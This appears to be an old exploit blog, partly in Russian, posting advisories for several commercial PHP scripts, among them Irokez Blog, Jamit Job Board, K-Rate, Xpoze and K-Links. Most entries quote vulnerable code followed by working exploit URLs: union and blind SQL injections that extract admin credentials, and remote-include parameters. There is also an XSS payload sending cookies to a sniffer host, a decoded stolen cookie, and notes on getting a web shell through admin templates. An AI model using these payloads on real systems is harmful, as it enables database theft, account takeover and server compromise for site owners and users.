Crw hp...

Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

Corwin — Sun, 22 Mar 2009 06:01:36 +0000

Application: Irokez Blog
Website: http://irokez.org
Version: All (0.7.3.2)
Date: 11-02-2009

[ BLIND SQL-INJECTION ]

[ SOME VULNERABLE CODE ]

/classes/table.class.php

... if ($is_trans) { $query = "select t.*, m.* from {$this->_name} m" . " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)" . " where m.id = '$id' group by {$this->_lang}"; } else { $query = "select * from {$this->_name} where id = '$id'"; } $result = $this->db->exeQuery($query);

===>>> Exploit:

http://irokez/blog/life/15′ and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and ’115
http://irokez/blog/life/15′ and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))=’114
etc

[ ACTIVE XSS ]

in comments.

[ SOME VULNERABLE CODE ]

/scripts/blog/output-post.inc.php

...

===>>> Exploit:

img = new Image(); img.src = «http://sniffer/sniff.jpg?»+document.cookie;

[ INCLUDE ]

[ SOME VULNERABLE CODE ]

/thumbnail.php ... ob_start(); switch ($module) { case 'gallery': include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php'; $Obj = new TBL_Gallery; $image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src'); break; default: $image_path = ''; }

===>>> Exploit:

http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]

http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]

Jamit Job Board SQL-INJECTION, XSS

Corwin — Wed, 28 Jan 2009 08:45:57 +0000

Еще в прошлом году на Милворме был выложен адвайс Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability. Как это часто бывает, в качестве конечного эксплоита была указана лишь строка для просмотра версии mysql, причем автор особо и не разобрался в сути уязвимости(самая обычная инъекция, какая еще blind?! 0o). После разбора хлама на винчестере я нашел свою версию advisory, написанную еще летом прошлого года.

Запомнился мне этот движок тем, что перед обнаружением всех этих багов на главной гордо висел длинный security changelog(лишь маленький кусок из него):

- Uploading files: File extensions are checked, only those allowed
can be uploaded
- Audit code for all possible RFI attacks and eval() attacks. The rule
is to never allow user input into file includes or eval()
- SQL injections – always escape quotes before going to the database. Always
pad all variables with quotes like ‘this’. No exceptions.
- XSS filtering – always remove JavaScript, dangerous HTML,
ASCII control characters before it is saved to the database.

================================================================================
|| Jamit Job Board SQL-INJECTION && XSS
================================================================================

Application: Jamit Job Board
————
Version: 3.4.8
——–
About: Job Board is a web application for running and managing a Job Board. Price: $199
——
Googledork: Jamit Job Board
———–
Website: http://jamit.com
——–
Demo: http://jamit.com/jobs/
—–
Date: 02-09-2008
—–

[ SQL-INJECTION ]

[ VULNERABLE CODE ]

/myjobs/browse.php && /myjobs/search.php

require («../include/profiles.inc.php»);
$sql = «SELECT * FROM `employers` WHERE `ID`=’».$_REQUEST['show_emp'].»‘ «;
$empl_result = JB_mysql_query($sql) or die (mysql_error());

...$sql = "SELECT profile_id FROM profiles_table where user_id='".$_REQUEST['show_emp']."'"; $result = JB_mysql_query ($sql) or die (mysql_error());


/include/posts.inc.php
if ($_REQUEST['show_emp'] > 0) { // is user_id > 0 ?

$show_emp_sql = " AND user_id=".$_REQUEST['show_emp']." ";

…

$sql = "SELECT * FROM posts_table where $approved_sql $premium $where_sql $show_emp_sql AND expired='N' $cat ORDER BY ($order) $ord ";

etc..

===>>> Exploit:

http://host/index.php?show_emp=1 union select 1,2,3,4,5,6,7,Username,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 from users

http://host/index.php?show_emp=1 union select 1,2,3,4,5,6,7,Password,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 from users

раскрытие пути

http://www.jamit.com/jobs/lang/lang.php

[ PASSIVE XSS ]

[ VULNERABLE CODE ]

/include/post.inc.php

/include/list.inc.php/include/functions.php

etc..

http://host/index.php?show_emp=1[XSS]

K-Rate SQL-INJECTION, XSS

Corwin — Thu, 25 Sep 2008 09:55:06 +0000

Application: K-Rate

Website: http://turn-k.net/k-rate

Version: All

About: K-Rate picture rating script. Price 115$.

Googledork: Powered by K-Rate

Date: 01-07-2008

Description:

Уязвимостям подвержены практически все модули(а также отдельные скрипты) входящие в состав K-Rate. SQL-Injection, активные XSS, а также множественные раскрытия путей, Blind SQL-Injection, пассивные XSS…

[ SQL-INJECTION ]

*) http://host/index.php?req=online&show=1[SQL]
*) В модуле чата: http://host/room/1[SQL]
*) В модуле голосования: http://raterally.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12&vote=3

http://raterally.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3

*) В модуле блогов пользователей.

http://raterally.com/blog/somegirl[SQL]

При редактировании блога: http://raterally.com/index.php?req=blog_edit&id=1[SQL]

and other other other…
[ VULNERABLE CODE ]

[ admin/includes/dele_cpac.php ]
$result = mysql_query("SELECT * FROM $admtable WHERE a_id=$id") or die (mysql_error());

[payments/payment_received.php]
$res = mysql_query("SELECT * FROM $paytable WHERE p_id=$ord[order_id]") or die(mysql_error());

[includes/functions.php]

function id_to_url($id) { global $linktable; $result = mysql_query("SELECT l_url FROM $linktable WHERE l_id=$id") or die(mysql_error()); ---------- if (mysql_affected_rows() == 0) { $r = mysql_query("SELECT l_cat FROM $linktable WHERE l_id=$id");

[modules/chat.php]

if ($act == 'users') {229: $res = sql_query("SELECT * FROM $chatonlinetable LEFT JOIN $membtable ON $membtable.m_id=$chatonlinetable.co_user WHERE co_room=$room ORDER BY co_user ASC");

===>>> Exploit:

http://host/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/*http://raterally.com/room/-1%20union%20select%201,version(),3,4/*http://host/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1(or use limit)/*

http://host/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*

/* Admin Login – http://host/admin

Далее, через Manage Templates получаем веб-шелл. */

[ ACTIVE XSS ]

*) При добавлении записей в собственный блог отсутствует фильтрация.
*) В форуме отсутствует всякая фильтрация.
*) Нет фильтрации поля, с названием загружаемого в галлерею изображения.

===>>> Exploit:

На логе сниффера получаем строку вроде:
YToyOntzOjQ6InVzZXIiO3M6NjoiY29yd2luIjtzOjQ6InBhc3MiO3M6MzI6IjFlOGVjNTkzMGE4ODk5MmU4MDJjZDFiYWU2YzA1OWNmIjt9

Декодируем:

echo base64_decode(«YToyOntzOjQ6InVzZXIiO3M6NjoiY29yd2luIjtzOjQ6InBhc3MiO3M6MzI6IjFlOGVjNTkzMGE4ODk5MmU4MDJjZDFiYWU2YzA1OWNmIjt9=»);
?>

Получаем логин и пароль(MD5):

a:2:{s:4:\»user\»;s:6:\»corwin\»;s:4:\»pass\»;s:32:\»1e8ec5930a88992e802cd1bae6c059cf\»;}

[ PASSIVE XSS ]

http://host/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]

and other other bugz …

Xpoz SQL-INJECTION, XSS

Corwin — Thu, 25 Sep 2008 04:18:46 +0000

Application: Xpoz PRO (Expoze Photo Store)

Website: http://xpoze.org

Version: All (current 1.0)

About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org

Date: 01-07-2008

Description:

Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS.

[ SQL-INJECTION ]

some…

http://host/home.html?menu=1[SQL]

http://host/user.html?uid=1[SQL]

http://host/account/admin/edite.html?eid=1[SQL]

http://host/video.html?limiter=0&c=1[SQL]

And other vulnerable files:
—————————

// $p=[admin, editor, user, photo]

[ members/$p/edite.inc ]

if (isset($delete)) { $ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error()); $row = mysql_fetch_assoc($ph); $url = "../photos/".$row['photo']; $thumb_url = "../thumbs/".$row['photo']; mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error()); $ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());

[ members/$p/editp.inc ]

$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());

[ include/img.rating.php ]

$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error()); $rates = mysql_num_rows($rat);

ETC…

===>>> Exploit:

http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20users%20limit%203,1/*

(!) Пароль в БД в открытом виде (!)

[ ACTIVE XSS ]

В форуме отсутствует фильтрация полей темы и сообщения.

===>>> Exploit:

[ PASSIVE XSS ]

http://host/?tpl=[XSS]

PHPInfo – http://host/info.php

E-topbiz Payment Processor 2 SQL-INJECTION

Corwin — Wed, 24 Sep 2008 15:37:48 +0000

Application: E-topbiz Payment Processor 2

Version: 2.0

Website: http://e-topbiz.com/oprema/pages/pproc2.php

Demo: http://e-topbiz.com/trafficdemos/payment2/

About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

Date: 01-08-2008

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())

K-Links Directory SQL-INJECTION, XSS

Corwin — Wed, 24 Sep 2008 14:40:38 +0000

Application: K-Links Directory

Website: http://turn-k.net/k-links

Version: Platinum (All)

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.

Googledork: Powered By K-Links Directory

Demo: http://klinksdemo.com

Date: 24-07-2008

Description:

Множественные SQL-Injection. Активные и пассивные XSS.

[ SQL-INJECTION ]

http://host/report/-1[SQL]

http://host/visit.php?id=-1[SQL]

http://host/addreview/-1[SQL]

http://host/refer/-1[SQL]

===>>> Exploit:

http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*

/* Admin Login – http://host/admin

Далее, через Manage Templates получаем веб-шелл. */

[ ACTIVE XSS ]

*) На сайте в поиске вбиваем

При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс.

*) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора.

[ PASSIVE XSS ]

http://host/index.php?req=login&redirect=&login_message=

PPVCHAT ACTIVE XSS

Corwin — Wed, 24 Sep 2008 14:21:25 +0000

Application: PPVCHAT

Website: http://ppvchat.com

Version: All

About: Pay-per-view adult video chat software. Price 999$.

Date: 05-07-2008

Description:

При регистрации новых пользователей/моделей нет фильтрации полей.

===>>> Exploit:

Dating 3 PHP Script SQL-INJECTION

Corwin — Wed, 24 Sep 2008 06:03:10 +0000

Application: E-topbiz Dating 3 PHP Script

Website: http://e-topbiz.com/oprema/pages/dating3.php

Demo: http://e-topbiz.com/trafficdemos/dating3

Version: 3.0

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.

Date: 01-08-2008

[ VULNERABLE CODE ]

members/mail.php

if($action==inbox) { $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it"); if($action==veiw) { $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");

===>>> Exploit:

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*

Recipe Script SQL-INJECTION

Corwin — Wed, 24 Sep 2008 05:19:21 +0000

Application: Recipe Script

Version: 6.0

Website: http://fivedollarscripts.com

Demo: http://recipebag.com

Date: 03-08-2008

[ VULNERABLE CODE ]

viewrecipe.php

$sql="select * from recipe where recipeid=$recid"; $res=mysql_query($sql);
$result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid"); if(mysql_num_rows($result))do it");

===>>> Exploit:

http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php

// Admin Login – http:/host/admin2